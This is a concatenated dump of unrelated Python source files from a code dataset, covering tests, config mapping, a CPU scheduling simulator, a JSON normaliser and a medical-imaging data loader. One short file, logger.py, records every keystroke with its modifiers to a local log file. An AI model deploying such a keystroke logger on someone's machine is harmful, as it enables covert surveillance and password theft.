explore=\"users\",\n model=\"eye_exam\",\n sql=\"SELECT age FROM users WHERE 1=2 LIMIT 1\",\n message=\"An error occurred.\",\n explore_url=\"https://spectacles.looker.com/x/qCJsodAZ2Y22QZLbmD0Gvy\",\n )\n\n\n@pytest.fixture\ndef schema():\n return load_resource(\"validation_schema.json\")\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"532150034","text":"import re\n#reg=r'\\s+[^(href)]*=\\\"[^<>]+\\\"'\nreg = r'\\b(?!(?:href|src))\\w+=([\"\\']).+?\\1'\nwith open(r'input.txt','r',encoding='ISO-8859-15') as f_read:\n html= f_read.read()\n result = re.sub(reg,\"\",html) #remove the original style\n \n result = re.sub(r'<\\s*table\\s*>','',result) #modify the class of table\n #result = re.sub(r'<\\s*table\\s*>','
    ',result) #modify the class of table\n \n print(result)\n with open(r'output.txt','w',encoding='ISO-8859-15') as f_write: \n f_write.write(result)\n \n","sub_path":"python/removeHtml.py","file_name":"removeHtml.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"477488089","text":"# -*- coding: utf-8 -*-\n__author__ = 'flanker'\nfrom djangofloor.iniconf import OptionParser, bool_setting\n\ndef x_accel_converter(value):\n if bool_setting(value):\n return [('{MEDIA_ROOT}/', '{MEDIA_URL}'), ]\n return []\n\n\nINI_MAPPING = [\n OptionParser('SERVER_NAME', 'global.server_name'),\n OptionParser('PROTOCOL', 'global.protocol'),\n OptionParser('BIND_ADDRESS', 'global.bind_address'),\n OptionParser('LOCAL_PATH', 'global.data_path'),\n OptionParser('ADMIN_EMAIL', 'global.admin_email'),\n OptionParser('TIME_ZONE', 'global.time_zone'),\n OptionParser('LANGUAGE_CODE', 'global.language_code'),\n OptionParser('USE_X_SEND_FILE', 'global.x_send_file', bool_setting),\n OptionParser('X_ACCEL_REDIRECT', 'global.x_accel_converter', x_accel_converter),\n OptionParser('FLOOR_AUTHENTICATION_HEADER', 'global.remote_user_header'),\n OptionParser('EXTRA_INSTALLED_APP', 'global.extra_app'),\n\n OptionParser('PUBLIC_BOOKMARKS', 'global.public_bookmarks', bool_setting),\n OptionParser('PUBLIC_PROXIES', 'global.public_proxies', bool_setting),\n OptionParser('PUBLIC_INDEX', 'global.public_index', bool_setting),\n OptionParser('PUBLIC_DOCS', 'global.public_docs', bool_setting),\n\n OptionParser('ES_HOSTS', 'elasticsearch.hosts'),\n OptionParser('ES_INDEX', 'elasticsearch.index'),\n\n OptionParser('REDIS_HOST', 'redis.host'),\n OptionParser('REDIS_PORT', 'redis.port'),\n\n OptionParser('DATABASE_ENGINE', 'database.engine'),\n OptionParser('DATABASE_NAME', 'database.name'),\n OptionParser('DATABASE_USER', 'database.user'),\n OptionParser('DATABASE_PASSWORD', 'database.password'),\n OptionParser('DATABASE_HOST', 'database.host'),\n OptionParser('DATABASE_PORT', 'database.port'),\n\n]\n","sub_path":"updoc/iniconf.py","file_name":"iniconf.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"288671300","text":"import json\n\n\ndef check_empty():\n with open('stats', 'r') as f:\n txt = f.read()\n if txt == '':\n loaded_stats = {'Bot': 0, 'Human': 0}\n else:\n return\n encoded_stats = json.JSONEncoder().encode(loaded_stats)\n with open('stats', 'w') as f:\n f.write(encoded_stats)\n\n\ndef update_stats(name):\n check_empty()\n with open('stats', 'r') as f:\n loaded_stats = json.load(f)\n loaded_stats[name] = loaded_stats.get(name, 0) + 1\n encoded_stats = json.JSONEncoder().encode(loaded_stats)\n with open('stats', 'w') as f:\n f.write(encoded_stats)\n\n\ndef center(value):\n return str(value).center(15)\n\n\ndef make_stars(n):\n return '*'*n\n\n\ndef print_stats():\n check_empty()\n with open('stats', 'r') as f:\n loaded_stats = json.load(f)\n print()\n\n for name, count in sorted(loaded_stats.items(), key=lambda item: item[1], reverse=True):\n name_text = f\"==> Total {name} wins:\".rjust(23)\n print(f\"{name_text} {count} | {make_stars(count)}\")\n print('\\n')\n\n\ndef clear_stats():\n with open('stats', 'w') as f:\n f.write('{\"Bot\": 0, \"Human\": 
0}')\n","sub_path":"game_stats.py","file_name":"game_stats.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"72536539","text":"import re\nfrom base import getToolByName, FunctionalTestCase, newSecurityManager\nfrom config import *\n\nclass TestExposeDCMetaTags(FunctionalTestCase):\n\n def afterSetUp(self):\n self.qi = self.portal.portal_quickinstaller\n self.sp = self.portal.portal_properties.site_properties\n self.qi.installProduct(PROJECT_NAME)\n self.basic_auth = 'portal_manager:secret'\n uf = self.app.acl_users\n uf.userFolderAddUser('portal_manager', 'secret', ['Manager'], [])\n user = uf.getUserById('portal_manager')\n if not hasattr(user, 'aq_base'):\n user = user.__of__(uf)\n newSecurityManager(None, user)\n\n '''Preparation for functional testing'''\n self.my_doc = self.portal.invokeFactory('Document', id='my_doc')\n self.my_doc = self.portal['my_doc']\n\n def test_exposeDCMetaTags_in_configletOn(self):\n path = self.portal.id+'/@@seo-controlpanel?exposeDCMetaTags=True&form.submitted=1'\n self.publish(path, self.basic_auth)\n self.assert_(self.sp.exposeDCMetaTags)\n\n def test_exposeDCMetaTags_in_configletOff(self):\n self.publish(self.portal.id+'/@@seo-controlpanel?form.submitted=1', self.basic_auth)\n self.assert_(not self.sp.exposeDCMetaTags)\n\n def test_exposeDCMetaTagsPropertyOff(self):\n self.sp.manage_changeProperties(exposeDCMetaTags = False)\n self.html = str(self.publish(self.portal.id+'/my_doc', self.basic_auth))\n m1 = re.match('.*', self.html, re.S|re.M)\n if not m1:\n m1 = re.match('.*', self.html, re.S|re.M)\n m2 = re.match('.*', self.html, re.S|re.M)\n if not m2:\n m2 = re.match('.*', self.html, re.S|re.M)\n m = m1 or m2\n self.assert_(not m, 'DC meta tags avaliable when exposeDCMetaTags=False')\n\n def test_exposeDCMetaTagsPropertyOn(self):\n self.sp.manage_changeProperties(exposeDCMetaTags = True)\n self.html = str(self.publish(self.portal.id+'/my_doc', self.basic_auth))\n m1 = re.match('.*', self.html, re.S|re.M)\n if not m1:\n m1 = re.match('.*', self.html, re.S|re.M)\n m2 = re.match('.*', self.html, re.S|re.M)\n if not m2:\n m2 = re.match('.*', self.html, re.S|re.M)\n m = m1 and m2\n self.assert_(m, 'DC meta tags not avaliable when createManager=True')\n\ndef test_suite():\n from unittest import TestSuite, makeSuite\n suite = TestSuite()\n suite.addTest(makeSuite(TestExposeDCMetaTags))\n return suite\n","sub_path":"quintagroup.seoptimizer/tags/2.2.0/quintagroup/seoptimizer/tests/testQSEOptimizerExposeDCMetaTags.py","file_name":"testQSEOptimizerExposeDCMetaTags.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"602225970","text":"#!/usr/bin/python\n\nimport keylogger\n\nimport os\n\nif __name__ == \"__main__\":\n file_dir = os.path.dirname(os.path.abspath(__file__))\n done = lambda: False\n f = open(os.path.join(file_dir, \"keystrokes.log\"), \"a\")\n def log(time, modifiers, keys):\n f.write(\"{},{},{}\\n\".format(time, modifiers, keys))\n keylogger.log(done, log)\n","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"279431555","text":"import os\nimport 
sys\n\n\n#plan=criar_PcbTabela('/home/andre/Documentos/plan.txt')\nTempo=0\n#Program_Counter=-1\nPcbTabela=[]\nProntos=[]\nBloqueados=[]\nRunningState=None\nTerminados=[]\nMemory=[]\nTime_Quantum=20\n\n#--------------- Instruction ----------------\nclass Instruction:\n def __init__(self,pro,ins,n,nome):\n self.pro=pro\n self.ins=ins\n self.n=n\n self.nome=nome\n#-------------- Instruction -------------------\n\n#------------- PCB ---------------------------\nclass PCB:\n def __init__(self,pid,pai,start,pc,prioridade,estado,tamanho,burst,inicio,fim,arrival):\n self.pid=pid\n self.pai=pai\n self.filho=[]\n self.start=start\n self.pc=pc\n self.prioridade=prioridade\n self.estado=estado\n self.tamanho=tamanho\n self.burst=burst\n self.inicio=inicio\n self.fim=fim\n self.arrival=arrival\n#------------- PCB ---------------------------\n\n#-------------- Update the PCB ------------------\ndef alterar_Pcb(pcb):#OK\n for i in range(len(PcbTabela)):\n a=PcbTabela[i]\n if(a.pid==pcb.pid):\n PcbTabela[i]=pcb\n break\n#-------------- Update the PCB ------------------\n\ndef prioridade():\n global RunningState\n global Bloqueados\n global Prontos\n if(RunningState==None):\n if(len(Prontos)==0):\n flag=fim()\n if(flag==0):\n return 1\n if flag==2:\n for i in range(len(Bloqueados)):\n a=Bloqueados[i]\n if(a.pai==0):\n a.estado=1\n Prontos.append(a)\n alterar_Pcb(a)\n Bloqueados.pop(i)\n break\n quem_RunningState()\n instrucao=Memory[(RunningState.pc)]\n validacao2(realizar_instrucao(instrucao))\n return 0\n return 0\n else:\n quem_RunningState()\n instrucao=Memory[(RunningState.pc)]\n validacao2(realizar_instrucao(instrucao))\n return 0\n else:\n quem_RunningState()\n instrucao=Memory[(RunningState.pc)]\n validacao2(realizar_instrucao(instrucao))\n return 0\n\n#-------------------- Execute the instructions ------------------------\ndef realizar_instrucao(instrucao):\n global RunningState\n global Memory \n global PcbTabela \n global Bloqueados \n global Terminados\n global Tempo #6\n if((instrucao.ins)=='M'):\n print(\"Execution---> %d %c %d %s\" % (instrucao.pro,instrucao.ins,instrucao.n,instrucao.nome))\n if(running_tamanho()==0):\n return 0\n return 1 #14\n elif((instrucao.ins)=='A'):\n print(\"Execution---> %d %c %d %s\" % (instrucao.pro,instrucao.ins,instrucao.n,instrucao.nome))\n if(running_tamanho()==0):\n return 0\n return 1 #20\n elif((instrucao.ins)=='S'):\n print(\"Execution---> %d %c %d %s\" % (instrucao.pro,instrucao.ins,instrucao.n,instrucao.nome))\n if(running_tamanho()==0):\n return 0\n return 1 #26\n elif((instrucao.ins)=='C'):\n print(\"Execution---> %d %c %d %s\" % (instrucao.pro,instrucao.ins,instrucao.n,instrucao.nome))\n inst=Memory[(RunningState.pc) +1]\n print(\"Execution---> %d %c %d %s\" % (inst.pro,inst.ins,inst.n,inst.nome)) \n aux=RunningState\n #----------------------------------\n s=\"/home/andre/Documentos/\"+inst.nome+\".txt\"\n comeco=len(Memory)\n tam=preencher_memoria(s,len(PcbTabela)+1)\n a=PCB(len(PcbTabela)+1,RunningState.pid,comeco,comeco,RunningState.prioridade,2,tam,tam,-1,-1,-1)\n aux.filho.append(a.pid)\n alterar_Pcb(aux)\n PcbTabela.append(a)\n Bloqueados.append(a)\n #print(\"Hello10\")\n ppid=os.fork()\n #print(\"Hello11\") \n if(ppid==0):\n #print(\"Hello12\")\n processos_concorrentes2(a.pid)\n #print(\"Hello13\")\n os._exit(0)\n else:\n #print(\"Hello14\")\n os.waitpid(ppid,0)\n #print(\"Hello15\")\n #exit()\n #----------------------------------\n #print(\"Hello16\")\n RunningState=aux\n RunningState.tamanho=RunningState.tamanho-2\n RunningState.pc=RunningState.pc+2\n
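prioridade() above hands scheduling decisions to quem_RunningState(), defined next, which scans the ready queue and keeps the PCB with the smallest prioridade value (lower number means stronger priority). The selection itself is just an argmin; a minimal sketch with plain (pid, prioridade) tuples as illustrative stand-ins for the PCB objects:

# Minimal sketch of the ready-queue scan quem_RunningState() performs:
# keep the entry with the smallest priority value.
ready = [(1, 3), (2, 1), (3, 2)]  # (pid, prioridade); illustrative values

best = None
for pid, prio in ready:
    if best is None or prio < best[1]:
        best = (pid, prio)
print(best[0])  # -> 2, the pid with the lowest (strongest) priority value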
alterar_Pcb(RunningState) #54\n if((Tempo%Time_Quantum)!=0):\n return 0 \n else:\n if(RunningState.tamanho !=0):\n return 0\n return 1 #60\n else:\n #---------------------------------\n aux=RunningState\n if((len(RunningState.filho)) !=0):\n for i in RunningState.filho:\n for j in PcbTabela:\n if(j.pid==i and j.estado !=4):\n #print(\"HELLO1\")\n pidd=os.fork() #70\n #print(\"HELLO2\")\n if(pidd==0):\n #print(\"HELLO3\")\n processos_concorrentes2(j.pid)\n #print(\"HELLO4\")\n else:\n os.waitpid(pidd,0)\n exit()\n #print(\"HELLO5\")\n if((Tempo%Time_Quantum)==0):\n break\n if((Tempo%Time_Quantum)==0):\n break\n RunningState=aux\n #---------------------------------\n if((Tempo%Time_Quantum)==0):\n return 0 #special return\n print(\"Execution---> %d %c %d %s\" % (instrucao.pro,instrucao.ins,instrucao.n,instrucao.nome))\n RunningState.tamanho=0\n alterar_Pcb(RunningState)\n Tempo=Tempo+1 \n return 1\n ## Revisit this part\n#-------------------- Execute the instructions ------------------------\n\n\n#------------------ Who gets RunningState ----------4\ndef quem_RunningState():\n global Prontos\n global RunningState\n aux=(0,-1)\n for i in range(len(Prontos)):\n if(aux[1]>Prontos[i].prioridade or aux[1]==-1):\n x=i\n y=Prontos[i].prioridade\n aux=(x,y)\n if(RunningState!=None):\n if(RunningState.pid !=Prontos[aux[0]].pid):\n aux2=RunningState\n RunningState=Prontos[aux[0]]\n RunningState.estado=3\n if(RunningState.inicio==-1):\n RunningState.inicio=Tempo\n alterar_Pcb(RunningState)\n aux2.estado=1\n alterar_Pcb(aux2)\n else:\n if(aux[1]!=-1):\n RunningState=Prontos[aux[0]]\n RunningState.estado=3\n if(RunningState.inicio==-1):\n RunningState.inicio=Tempo\n alterar_Pcb(RunningState)\n\ndef quem_RunningState2():\n global Prontos\n global RunningState\n aux=(0,-1)\n for i in range(len(Prontos)):\n if(aux[1]>Prontos[i].prioridade or aux[1]==-1):\n x=i\n y=Prontos[i].prioridade\n aux=(x,y)\n return (Prontos[aux[0]].pid)\n\ndef processos_concorrentes2(pid):#OK\n global RunningState\n global Bloqueados\n global Memory\n global Tempo\n global Time_Quantum\n for i in Bloqueados:\n if(i.pid==pid and i.estado!=4):\n RunningState=i\n RunningState.estado=3\n alterar_Pcb(RunningState)\n break\n while(True):\n verificar_arrival()\n if((Tempo%Time_Quantum)==0):# when Tempo hits the Time_Quantum boundary\n RunningState.estado=2\n alterar_Pcb(RunningState)\n Bloqueados.append(RunningState)\n break\n else:\n #aux=RunningState\n #print(\"*****\")\n #print(RunningState.pid)\n pid=quem_RunningState2()\n #print(pid)\n #print(\"/////\")\n #print(RunningState.pid)\n #RunningState=aux\n if(RunningState.pai!=pid):\n #print(\"switch\")\n RunningState.estado=2\n alterar_Pcb(RunningState)\n Bloqueados.append(RunningState)\n break\n instrucao=Memory[RunningState.pc]\n resultado=realizar_instrucao(instrucao)\n #print(\"result\")\n #print(resultado)\n validacao2(resultado)\n if(resultado==1):\n print(\"Finished in processo_concorrentes\")\n break\n\ndef running_tamanho():#OK\n global RunningState\n global Tempo\n RunningState.tamanho=RunningState.tamanho-1\n if(RunningState.tamanho!=0):\n RunningState.pc=RunningState.pc+1\n alterar_Pcb(RunningState)\n Tempo=Tempo+1\n return 0\n alterar_Pcb(RunningState)\n Tempo=Tempo+1\n return 1\n\ndef validacao2(resultado):\n global RunningState\n global Prontos\n if(resultado==1):\n RunningState.estado=4\n RunningState.fim=Tempo\n Terminados.append(RunningState.pid)\n alterar_Pcb(RunningState)\n for i in range(len(Prontos)):\n if(Prontos[i].pid==RunningState.pid):\n Prontos.pop(i)\n break\n
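realizar_instrucao and processos_concorrentes2 above drive child execution through the classic os.fork()/os.waitpid() pattern: the child does its work and leaves via os._exit() so it never falls back into the parent's code path, while the parent blocks until the child terminates. A stripped-down sketch of that pattern (POSIX only; the payload prints are illustrative):

import os

pid = os.fork()
if pid == 0:
    # Child: do the work, then exit WITHOUT returning to the caller's code.
    print("child running, pid", os.getpid())
    os._exit(0)
else:
    # Parent: block until the child terminates.
    os.waitpid(pid, 0)
    print("child", pid, "finished")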
RunningState=None\n\n#--------------- Put the process in the Prontos queue ---------\ndef verificar_arrival():#OK\n global Tempo\n global PcbTabela\n global Prontos\n for i in PcbTabela:\n if(i.estado==0 and i.pai==0):\n if(i.arrival==Tempo):\n i.estado=1\n alterar_Pcb(i)\n Prontos.append(i)\n#--------------- Put the process in the Prontos queue ---------\n\n#-------------- Have the processes finished executing ------------\ndef fim():#OK\n global PcbTabela\n global Bloqueados\n global Tempo\n flag=0\n for i in PcbTabela:\n if(i.tamanho!=0 and i.pai==0):\n flag=1\n break\n if flag==1:\n if(len(Bloqueados)!=0):\n for i in Bloqueados:\n if(i.pai==0):\n return 2 #some are still blocked\n Tempo= Tempo + 1\n return 1\n else:\n print(\"end\")\n return 0 # nothing left to run\n#-------------- Have the processes finished executing ------------\n\n\n#------------ Function to read the plan.txt file -----------\ndef read_file_plan(nome):#OK\n file=open(nome,\"r\")\n lines=file.readlines()\n fila=[]\n for i in lines:\n a=i.strip()\n b=a.split(\",\")\n fila.append(b)\n return fila\n#------------ Function to read the plan.txt file -----------\n\n#----------- Fill the memory ------------------\ndef preencher_memoria(nome,index):#OK\n global Memory\n file=open(nome,\"r\")\n lines=file.readlines()\n for i in lines:\n a=i.strip()\n b=a.split(\" \")\n if b[0]=='L':\n c=Instruction(index,b[0],0,b[1])\n elif b[0]=='T':\n c=Instruction(index,b[0],0,None)\n else:\n z=int(b[1])\n c=Instruction(index,b[0],z,None)\n Memory.append(c)\n return (len(lines))\n#----------- Fill the memory ------------------\n\n#.---------- Build the PcbTabela ---------------------\ndef criar_PcbTabela(nome):#OK\n global PcbTabela\n fila=read_file_plan(nome)\n aux=0\n for i in range(len(fila)):\n array=fila[i]\n string=array[0]\n tam=preencher_memoria(string,i+1)\n z=int(array[2])\n zz=int(array[1])\n a=PCB(i+1,0,aux,aux,z,0,tam,tam,-1,-1,zz)\n PcbTabela.append(a)\n aux=tam+aux\n return fila\n#.---------- Build the PcbTabela ---------------------\n\ndef main():\n global Tempo\n global Time_Quantum\n global RunningState\n global Bloqueados\n global Prontos\n global Terminados\n control=read_file_plan('/home/andre/Documentos/control.txt')\n plan=criar_PcbTabela('/home/andre/Documentos/plan.txt')\n #plan=criar_PcbTabela('/home/andre/Documentos/plan2.txt')\n flag=0\n pode=0\n while(len(control)!=0):\n cont=control.pop(0)\n if(cont[0]==\"E\"):\n while((Tempo%Time_Quantum)!=0 or pode==0):\n pode=1\n print(Tempo)\n verificar_arrival()\n final=prioridade()\n if((final)==1):\n flag=1\n break\n pode=0\n elif(cont[0]==\"I\"):\n if(RunningState != None):\n RunningState.estado=2\n alterar_Pcb(RunningState)\n Bloqueados.append(RunningState)\n RunningState=None\n elif(cont[0]==\"D\"):\n for i in range(len(Bloqueados)):\n a=Bloqueados[i]\n if(a.pai==0):\n a.estado=1\n Prontos.append(a)\n alterar_Pcb(a)\n Bloqueados.pop(i)\n break\n elif(cont[0]==\"R\"):\n print(\"Time-> %d\" % Tempo)\n if(RunningState != None):\n print(\"Running-> %d\" % RunningState.pid)\n else:\n print(\"Running-> None\")\n for i in range(len(Bloqueados)):\n a=Bloqueados[i]\n if(a.pai==0):\n print(\"Blocked-> %d\" % a.pid)\n for i in range(len(Prontos)):\n a=Prontos[i]\n print(\"Ready to run-> %d\" % a.pid)\n for i in range(len(Terminados)):\n print(\"Finished-> %d\" % Terminados[i])\n else:\n while(True):\n print(Tempo)\n verificar_arrival()\n final=prioridade()\n if(final==1):\n flag=1\n break\n if(flag==0):\n while(True):\n #print(\"1001\")\n verificar_arrival()\n #print(\"1002\")\n
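At the end of main(), just below, per-process metrics are derived from the PCB timestamps: turnaround time tat = fim - arrival (completion time minus arrival time) and waiting time wt = tat - burst (turnaround minus the CPU time actually consumed). A one-shot worked example of that arithmetic with illustrative numbers:

# Worked example of the metric arithmetic used at the end of main():
arrival, fim, burst = 2, 30, 12  # illustrative timestamps / CPU demand
tat = fim - arrival              # turnaround: 28 time units in the system
wt = tat - burst                 # waiting: 16 units spent not executing
print(tat, wt)                   # -> 28 16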
final=prioridade()\n #print(\"1003\")\n if(final==1):\n flag=1\n break\n listaf=[]\n for i in PcbTabela:\n listai=[]\n if(i.pai==0):\n #print(\"pid\")\n #print(i.pid)\n #print(\"i.inicio\")\n #print(i.inicio)\n #print(\"i.fim\")\n #print(i.fim)\n #print(\"i.burst\")\n #print(i.burst)\n tat=i.fim-i.arrival\n #print(\"tat\")\n #print(tat)\n wt=tat-i.burst\n #print(\"wt\")\n #print(wt)\n #rt=i.inicio-i.arrival\n listai.append(tat)\n listai.append(wt)\n #listai.append(rt)\n listaf.append(listai)\n for i in listaf:\n for j in i:\n #print(i)\n print(j)\n\n\n\"\"\"\ndef main():\n global Tempo\n global Time_Quantum\n global RunningState\n global Bloqueados\n global Prontos\n global Terminados\n control=read_file_plan('/home/andre/Documentos/control.txt')\n plan=criar_PcbTabela('/home/andre/Documentos/plan.txt')\n while(True):\n if(RunningState==None):\n print(RunningState)\n else:\n print(RunningState.pid)\n verificar_arrival()\n final=prioridade()\n if((final)==1):\n break\n\"\"\"\nmain()\n","sub_path":"simulador2.py","file_name":"simulador2.py","file_ext":"py","file_size_in_byte":15141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"372033779","text":"\"\"\"normalize_slow.py: normalize json files in a folder\nCopy json data from folder_name to folder_name_normalized\nWork in the folder folder_name_normalized\nGet x/y_mean and x/y_stddev for whole folder and write it into a dictionary\nuse the dictionary to normalize the values\nwrite normalized values into json file in folder_name_normalized\n\nsame functions as normalize_slow.py, but copying files on-the-fly without a saved copy beforehand\n\"\"\"\n\nimport json\nimport time\n\nimport numpy as np\nimport os\nimport statistics\nfrom distutils.dir_util import copy_tree\nfrom pathlib import Path\nimport sys\n\n\nclass Normalize:\n\n def __init__(self, path_to_json_dir):\n self.path_to_json = path_to_json_dir\n\n def main_normalize(self):\n print(\"Start to copy files...\")\n # self.copy_files()\n self.normalize()\n\n def copy_files(self):\n # copy\n os.walk(self.path_to_json)\n subdirectories = [x[1] for x in os.walk(self.path_to_json)]\n data_folder = Path(self.path_to_json)\n # if there are folders with \"_normalized\" don't copy them again\n subdirectories_copy = [s for s in subdirectories[0] if \"_normalized\" not in s]\n for subdir in subdirectories_copy:\n if not os.path.exists(data_folder / str(subdir + \"_normalized\")):\n os.makedirs(data_folder / str(subdir + \"_normalized\"))\n copy_tree(str(data_folder / subdir), str(data_folder / str(subdir + \"_normalized\")))\n\n print(\"Copied files from %s to %s\" % (\n str(data_folder / subdir), str(data_folder / str(subdir + \"_normalized\"))))\n\n def normalize(self):\n # copy\n os.walk(self.path_to_json)\n subdirectories = [x[1] for x in os.walk(self.path_to_json)]\n data_folder = Path(self.path_to_json)\n # if there are folders with \"_normalized\" don't copy them again\n subdirectories_copy = [s for s in subdirectories[0] if \"_normalized\" not in s]\n for subdir in subdirectories_copy:\n if not os.path.exists(data_folder / str(subdir + \"_normalized\")):\n os.makedirs(data_folder / str(subdir + \"_normalized\"))\n # copy_tree(str(data_folder / subdir), str(data_folder / str(subdir + \"_normalized\")))\n\n print(\"Copied files from %s to %s\" % (\n str(data_folder / subdir), str(data_folder / str(subdir + \"_normalized\"))))\n\n # used keys of openpose here\n keys = ['pose_keypoints_2d', 'face_keypoints_2d', 'hand_left_keypoints_2d',
'hand_right_keypoints_2d']\n folder_mean_stddev = {'pose_keypoints_2d': [], 'face_keypoints_2d': [], 'hand_left_keypoints_2d': [],\n 'hand_right_keypoints_2d': []}\n all_mean_stddev = {}\n\n # work\n os.walk(self.path_to_json)\n subdirectories = [x[1] for x in os.walk(self.path_to_json)]\n data_folder = Path(self.path_to_json)\n # if there are folders with \"_normalized\" use em for working directories\n subdirectories_work = [s for s in subdirectories[0] if \"_normalized\" in s]\n\n # get mean and stddev of whole folder and write it into a dictionary\n # the dictionary contains for each key the mean and stddev for x and y of the whole folder:\n # folder_name - key - 0 - 0: array of x_mean\n # folder_name - key - 0 - 1: array of x_stddev\n # folder_name - key - 1 - 0: array of y_mean\n # folder_name - key - 1 - 1: array of y_stddev\n for subdir in subdirectories_copy:\n print(\"Computing mean and stddev for %s\" % (subdir))\n json_files = [pos_json for pos_json in os.listdir(data_folder / subdir)\n if pos_json.endswith('.json')]\n idx = 0\n for k in keys:\n x_all = []\n y_all = []\n x_all_T = []\n y_all_T = []\n for file in json_files:\n # print(file)\n # set file for class\n x, y = self.get_points(data_folder / subdir, file, k)\n\n x_all.append(x)\n y_all.append(y)\n\n x_all_T = np.array(x_all).T.tolist()\n y_all_T = np.array(y_all).T.tolist()\n # print(x_all_T)\n # if idx % 500 == 0:\n # print(\"%s file : %d of %d\" % (file, idx, len(json_files)))\n # idx += 1\n\n # fill dictionary for each folder with y/x_mean, y/x_stddev\n folder_mean_stddev[k] = [self.get_mean_stddev(x_all_T), self.get_mean_stddev(y_all_T)]\n print(folder_mean_stddev)\n # print(folder_mean_stddev)\n all_mean_stddev[subdir] = folder_mean_stddev.copy()\n\n print(\"Computed all mean and stddev. 
Normalizing...\")\n\n # use mean and stddev from above to compute values for the json files\n for subdir in subdirectories_copy:\n folder_mean_stddev = all_mean_stddev[subdir]\n json_files = [pos_json for pos_json in os.listdir(data_folder / subdir)\n if pos_json.endswith('.json')]\n\n for file in json_files:\n jsonFile = open(data_folder / subdir / file, \"r\") # Open the JSON file for reading\n data = json.load(jsonFile) # Read the JSON into the buffer\n jsonFile.close() # Close the JSON file\n\n # x -> [0::3]\n # y -> [1:.3]\n # c -> [2::3] (confidence)\n for k in keys:\n # x values\n temp_x = data['people'][0][k][0::3]\n temp_y = data['people'][0][k][1::3]\n temp_c = data['people'][0][k][2::3]\n\n # get x values and normalize it\n for index in range(len(temp_x)):\n mean = folder_mean_stddev[k][0][0][index]\n stddev = folder_mean_stddev[k][0][1][index]\n if stddev != 0:\n temp_x[index] = (temp_x[index] - mean) / stddev\n else:\n temp_x[index] = temp_x[index]\n\n # get y values and normalize it\n for index in range(len(temp_y)):\n mean = folder_mean_stddev[k][1][0][index]\n stddev = folder_mean_stddev[k][1][1][index]\n if stddev != 0:\n temp_y[index] = (temp_y[index] - mean) / stddev\n else:\n temp_y[index] = temp_y[index]\n\n # build new array of normalized values\n values = []\n for index in range(len(temp_x)):\n values.append(temp_x[index])\n values.append(temp_y[index])\n values.append(temp_c[index])\n\n # copy the array of normalized values where it came from\n data['people'][0][k] = values\n\n # ## Save our changes to JSON file\n jsonFile = open(data_folder / str(subdir + \"_normalized\") / file, \"w+\")\n jsonFile.write(json.dumps(data))\n jsonFile.close()\n\n def get_points(self, path, file, key):\n temp_df = json.load(open(path / file))\n temp_x_pose = temp_df['people'][0][key][0::3]\n temp_y_pose = temp_df['people'][0][key][1::3]\n return [temp_x_pose, temp_y_pose]\n\n def get_mean_stddev(self, values):\n means = []\n std_devs = []\n for array in values:\n # print(array)\n means.append(np.mean(array))\n std_devs.append(statistics.stdev(array))\n return [means, std_devs]\n\n def compute_normalization(self, values):\n result = []\n for array in values:\n # print(array)\n mean = np.mean(array)\n std_dev = statistics.stdev(array)\n helper_array = []\n for element in array:\n if std_dev != 0:\n helper_array.append((element - mean) / std_dev)\n else:\n helper_array.append(element)\n result.append(helper_array)\n return result\n\n\nif __name__ == '__main__':\n if len(sys.argv) > 1:\n path_to_json_dir = sys.argv[1]\n else:\n path_to_json_dir = r\"C:\\Users\\Asdf\\Downloads\\How2Sign_samples\\openpose_output\\json\"\n norm = Normalize(path_to_json_dir)\n start_time = time.time()\n norm.main_normalize()\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n","sub_path":"ma/scripts/20-02-19_normalization/normalize_slow_no_copy.py","file_name":"normalize_slow_no_copy.py","file_ext":"py","file_size_in_byte":8624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"27840570","text":"import tensorlayer as tl\nimport numpy as np\nimport os, csv, random, gc, time, pickle\nimport nibabel as nib\nimport tensorflow as tf\nfrom tensorlayer.layers import *\nfrom google.colab import files\nimport os\nfrom pydrive.auth import GoogleAuth\nfrom pydrive.drive import GoogleDrive\nfrom google.colab import auth\nfrom oauth2client.client import GoogleCredentials\n\nauth.authenticate_user()\ngauth = GoogleAuth()\ngauth.credentials = 
GoogleCredentials.get_application_default()\ndrive = GoogleDrive(gauth)\n\n# Load the Drive helper and mount\nfrom google.colab import drive as dd\ndd.mount('/content/drive')\n\nfrom googleapiclient.http import MediaFileUpload\nfrom googleapiclient.discovery import build\ndrive_service = build('drive', 'v3')\n\n\n\n\nDATA_SIZE = 'small'\n\nsave_dir = '/data/train_dev_all/'\n\nif not os.path.exists(save_dir):\n os.makedirs(save_dir)\n \nHGG_data_path = \"/content/drive/My Drive/BRATS2018/HGG\"\nLGG_data_path = \"/content/drive/My Drive/BRATS2018/LGG\"\nsurvival_csv_path = \"/content/drive/My Drive/BRATS2018/survival_data.csv\"\n\nsurvival_id_list = []\nsurvival_age_list = []\nsurvival_peroid_list = []\n\nwith open(survival_csv_path, 'r') as f:\n reader = csv.reader(f)\n next(reader)\n for idx, content in enumerate(reader):\n survival_id_list.append(content[0])\n survival_age_list.append(float(content[1]))\n survival_peroid_list.append(float(content[2]))\n\n#print(len(survival_id_list)) #163\n\nif DATA_SIZE == 'all':\n HGG_path_list = tl.files.load_folder_list(path=HGG_data_path)\n LGG_path_list = tl.files.load_folder_list(path=LGG_data_path)\nelif DATA_SIZE == 'half':\n HGG_path_list = tl.files.load_folder_list(path=HGG_data_path)[0:100]# DEBUG WITH SMALL DATA\n LGG_path_list = tl.files.load_folder_list(path=LGG_data_path)[0:30] 